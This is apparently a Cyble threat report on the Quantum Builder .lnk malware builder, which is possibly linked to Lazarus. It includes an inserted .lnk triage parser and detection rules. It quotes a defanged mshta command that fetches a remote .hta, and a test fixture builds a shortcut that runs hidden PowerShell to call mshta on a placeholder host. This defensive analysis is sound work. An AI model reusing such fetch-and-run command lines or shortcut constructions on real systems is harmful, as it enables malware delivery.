Cyble-Quantum-Builder

Quantum Software: LNK file-based builders growing in popularity

Possibly associated with Lazarus APT group

Cyble Research Labs continuously tracks emerging threats and their delivery mechanisms. We have observed a surge in the use of .lnk files by various malware families. Some of the prevalent malware families that have recently used .lnk files for payload delivery are:

Additionally, we have seen many APT instances where the Threat Actors (TAs) leverage .lnk files for their initial execution to deliver the payload.

.lnk files are shortcut files that reference other files, folders, or applications in order to open them. TAs leverage .lnk files to drop malicious payloads using LOLBins. LOLBins (Living off the Land Binaries) are binaries native to the operating system, such as PowerShell and mshta. TAs use such binaries to evade detection mechanisms because the operating system already trusts them.

During our OSINT (Open Source Intelligence) activity, Cyble Research Labs came across a new .lnk builder dubbed “Quantum Software/Quantum Builder.” Figure 1 shows a post made by the Threat Actor on a cybercrime forum.

Figure 1 – Post made by TA on a cybercrime forum

The TA claims that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. Figure 2 shows the pricing details and functionality of the builder.

Figure 2 – Functionality and pricing details

The TA has created a video demonstrating how to build .lnk, .hta, and .iso files using Quantum Builder. The .hta payload can be created in Quantum Builder by customizing options such as the payload URL, DLL support, UAC bypass, execution path, and a time delay before the payload executes.

Figure 3 – .hta builder

The .lnk builder embeds the generated .hta payload and creates a new .lnk file. The builder offers a choice of icons while building the .lnk file. The figure below shows the Quantum .lnk builder.

Figure 4 – .lnk builder

At the end of this process, the .iso builder is used to create the .iso image containing the .lnk file for further delivery via email and execution.

Figure 5 – .iso builder

The TA has also claimed to have implemented a DogWalk n-day exploit. This vulnerability exists in the Microsoft Support Diagnostic Tool (MSDT) and could lead to code execution if the user opens a specially crafted .diagcab file, typically sent by TAs over email. The .diagcab file then downloads a malicious file into the Startup folder, which is executed every time the user logs in.

Figure 6 – DogWalk implementation

Technical Analysis

Further investigation revealed a post shared by the TA, indicating that the following sample might have been generated using Quantum Builder:

SHA256: 2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25

The figure below shows the post made by the TA regarding the above sample.

Figure 7 – Twitter post linked by TA on a cybercrime forum

The sample mentioned in the above post connects to a domain named “quantum-software.online”; the same domain was used by the Quantum TA as a demo site, as shown in the figure below. This indicates that the identified sample was generated using Quantum Builder.

Figure 8 – Demo site used by TA

This sample is a Windows Shortcut (.LNK) file. Windows always hides the .lnk extension, so if a file is named file_name.txt.lnk, only file_name.txt is visible to the user, even when the option to show file extensions is enabled. This makes .lnk files an attractive disguise or smokescreen for TAs.
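The two properties the report relies on, that a shortcut carries its own target and command-line arguments, and that Explorer hides the .lnk suffix so a double extension goes unnoticed, can both be checked directly from the file. The following triage parser is an added example, not code from the report or from Quantum Builder: it reads the ShellLinkHeader and StringData sections as laid out in Microsoft's MS-SHLLINK specification (IDList, LinkInfo and ExtraData blocks are skipped, and the non-Unicode code page is approximated as latin-1), recovers the command line, and flags the signals a responder looks for: a double extension, a LOLBin target, a remote URL and a hidden-window ShowCommand. The sample shortcut is constructed by `build_sample_lnk` purely as a test fixture, and `example.invalid` is a placeholder host.

```python
"""Triage parser for Windows shortcut (.lnk, MS-SHLLINK) files.

Reads the ShellLinkHeader and the StringData section, returns the target,
arguments and ShowCommand, and applies the checks a responder would run on a
shortcut attachment: double extension, LOLBin target, remote URL, hidden window.
"""
import struct

# LinkCLSID 00021401-0000-0000-C000-000000000046, stored little-endian
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that starts the target without a visible window

# LOLBins seen in this report's chain (powershell, mshta) plus common companions
LOLBINS = ("powershell", "mshta", "cmd.exe", "rundll32", "regsvr32", "wscript", "cscript")


def _read_string(data, offset, unicode):
    """One StringData entry: u16 CountCharacters followed by the characters."""
    count = struct.unpack_from("<H", data, offset)[0]
    offset += 2
    if unicode:
        end = offset + count * 2
        return data[offset:end].decode("utf-16-le"), end
    end = offset + count
    return data[offset:end].decode("latin-1"), end  # ANSI code page approximated as latin-1


def parse_lnk(data):
    """Return header flags, ShowCommand and the StringData fields of a shortcut."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    offset = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList block (u16 size prefix)
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                    # skip the LinkInfo block (u32 total size)
        offset += struct.unpack_from("<I", data, offset)[0]
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "show_command": show_command}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            info[name], offset = _read_string(data, offset, unicode)
    return info                                  # ExtraData blocks that follow are ignored


def has_double_extension(filename):
    """invoice.txt.lnk -> True: Explorer never shows .lnk, even with extensions enabled."""
    name = filename.lower()
    if not name.endswith(".lnk"):
        return False
    return "." in name[:-4].strip(".")


def triage(filename, data):
    """Run the triage checks and return the recovered command line plus findings."""
    info = parse_lnk(data)
    command_line = " ".join(s for s in (info.get("relative_path", ""), info.get("arguments", "")) if s)
    lowered = command_line.lower()
    findings = []
    if has_double_extension(filename):
        findings.append("double extension in file name")
    if any(b in lowered for b in LOLBINS):
        findings.append("LOLBin in target")
    if "http://" in lowered or "https://" in lowered:
        findings.append("remote URL in arguments")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("hidden window (SW_SHOWMINNOACTIVE)")
    return {"command_line": command_line, "findings": findings}


def build_sample_lnk(relative_path, working_dir, arguments, icon_location, show_command=SW_SHOWMINNOACTIVE):
    """Constructed fixture: a minimal shortcut with StringData only (no IDList, no LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0,
                         show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments, icon_location))
    return header + body


# Constructed sample resembling the chain in this report; example.invalid is a placeholder host.
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"C:\Windows\System32",
    '-w hidden -c "mshta https://example.invalid/remote/payload.hta"',
    r"%SystemRoot%\System32\shell32.dll",
)

if __name__ == "__main__":
    print(triage("report.txt.lnk", SAMPLE_LNK))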

Figure 9 – File details

Upon execution, the .lnk file runs malicious PowerShell code, which uses mshta to execute a .hta file hosted on a remote site.

The PowerShell script uses a function that deobfuscates the malicious PowerShell payload. The function performs a mathematical operation on each numeric value and converts the result into a character. The figure below shows the deobfuscated data.

Figure 10 – De-obfuscated data

Command: “C:\Windows\system32\mshta.exe” hxxps[:]//quantum-software[.]online/remote/bdg[.]hta
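The execution chain recovered above (Explorer launches the shortcut, PowerShell runs with a hidden window, mshta fetches a remote .hta) and the Startup-folder drop described for the DogWalk .diagcab both leave characteristic process-creation and file-creation telemetry. The detection logic below is an added example written for this report, not Cyble's own tooling: it runs a handful of rules over constructed Sysmon-style Event ID 1 and Event ID 11 records, refangs the report's defanged IOC so it can be matched against the URL host, and tags each hit with the ATT&CK technique it maps to. The sample records, including the process image on the file-creation event, are constructed for the example.

```python
"""Detection logic for the execution chain described in this report, run over
constructed Sysmon-style records: Event ID 1 (process creation) for
explorer.exe -> powershell.exe -> mshta.exe <remote .hta>, and Event ID 11
(file creation) for a drop into the per-user Startup folder.
"""
import re
from urllib.parse import urlparse

# Defanged IOC exactly as published in the report; refang() makes it matchable.
IOC_URLS = ["hxxps[:]//quantum-software[.]online/remote/bdg[.]hta"]


def refang(ioc):
    """Turn a defanged indicator (hxxps[:]//host[.]tld) back into a plain URL."""
    return ioc.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


IOC_HOSTS = {urlparse(refang(u)).hostname for u in IOC_URLS}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze_process_event(evt):
    """Return (rule_id, reference) hits for one process-creation record."""
    hits = []
    image, parent = basename(evt["Image"]), basename(evt["ParentImage"])
    cmd = evt["CommandLine"]
    urls = URL_RE.findall(cmd)
    # T1218.005: mshta handed a remote .hta to fetch and run
    if image == "mshta.exe" and urls:
        hits.append(("mshta_remote_hta", "T1218.005"))
    # T1059.001: shortcut launched from Explorer runs PowerShell with a hidden window
    if image == "powershell.exe" and parent == "explorer.exe" and HIDDEN_WINDOW_RE.search(cmd):
        hits.append(("hidden_powershell_from_explorer", "T1059.001"))
    if image == "mshta.exe" and parent == "powershell.exe":
        hits.append(("powershell_spawns_mshta", "T1218.005"))
    # IOC match on the URL host, independent of process lineage
    if any(urlparse(u).hostname in IOC_HOSTS for u in urls):
        hits.append(("known_ioc_host", "IOC"))
    return hits


def analyze_file_event(evt):
    """Flag executable content written to the Startup folder (T1547.001)."""
    target = evt["TargetFilename"]
    if STARTUP_DIR_RE.search(target) and target.lower().endswith((".exe", ".lnk", ".hta", ".vbs", ".bat")):
        return [("startup_folder_drop", "T1547.001")]
    return []


def analyze(evt):
    return analyze_process_event(evt) if evt["EventID"] == 1 else analyze_file_event(evt)


# Constructed sample telemetry (not from the report): the malicious chain plus benign noise.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "<obfuscated script elided>"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\system32\mshta.exe" https://quantum-software.online/remote/bdg.hta'},
    {"EventID": 11, "Image": r"C:\Windows\System32\msdt.exe",  # image is a constructed value
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\system32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]


def run_detections(events):
    """Indices of events that triggered at least one rule, together with their hits."""
    return [(i, analyze(e)) for i, e in enumerate(events) if analyze(e)]


if __name__ == "__main__":
    for i, hits in run_detections(SAMPLE_EVENTS):
        evt = SAMPLE_EVENTS[i]
        print(i, evt.get("CommandLine") or evt["TargetFilename"], hits)
```

The local-file mshta launch in the fourth record deliberately produces no hit: mshta on its own is a legitimate binary, and the rule keys on a remote URL or a PowerShell parent rather than on the image name alone.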

The infection chain is represented below.

Figure 11 – Infection Chain

Possible links to Lazarus APT

In recent samples and research conducted on Lazarus APT, we observed that the TAs were using .lnk files to deliver further-stage payloads. Upon comparing the PowerShell scripts from both samples, we found that the deobfuscation loop and the initialization of variables were the same, indicating a possible connection between Quantum Builder and the Lazarus APT group.

Figure 12 – Similar PowerShell script

Conclusion

We have observed a steadily increasing number of high-profile TAs shifting back to .lnk files to deliver their payloads. Typically, TAs use LOLBins in such infection mechanisms because it makes detecting malicious activity significantly harder.

The MSDT zero-day vulnerability, which researchers recently discovered, also abused a LOLBin. Within a short window of it being observed in the wild, TAs had leveraged this vulnerability through different attack vectors.

The TA behind Quantum Builder appears to be updating the malicious tool with new attack techniques, making it more attractive to other TAs. We will likely see more usage of such tools in the near future.

Our Recommendations 

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

  • Refrain from opening untrusted links and email attachments without verifying their authenticity.
  • Use strong passwords and enforce multi-factor authentication wherever possible.
  • Verify the source of files before executing them.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.
  • Use a reputable anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.
  • Conduct regular backups and keep those backups offline or in a separate network.

MITRE ATT&CK® Techniques

Tactic             Technique ID   Technique Name
Initial Access     T1566          Phishing
Execution          T1204          User Execution
Execution          T1059          Command and Scripting Interpreter
Defense Evasion    T1218          System Binary Proxy Execution
Defense Evasion    T1140          Deobfuscate/Decode Files or Information

Indicators of Compromise (IOCs)

Indicators                                                          Indicator Type   Description
04e8a5c6e5797b0f436ca36452170a2f                                    MD5              .lnk file
924be824edb54f917d52e43a551c0eb2848cad8f                            SHA-1            .lnk file
2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25    SHA-256          .lnk file
hxxps[:]//quantum-software[.]online/remote/bdg[.]hta                Domain           Malicious Domain
52b0b06ab4cf6c6b1a13d8eec2705e3b                                    MD5              Lazarus .lnk file
dfdde88da020e584038d2656d0e3d48cfae27b1a                            SHA-1            Lazarus .lnk file
b9899082824f1273e53cbf1d455f3608489388672d20b407338ffeecefc248f1    SHA-256          Lazarus .lnk file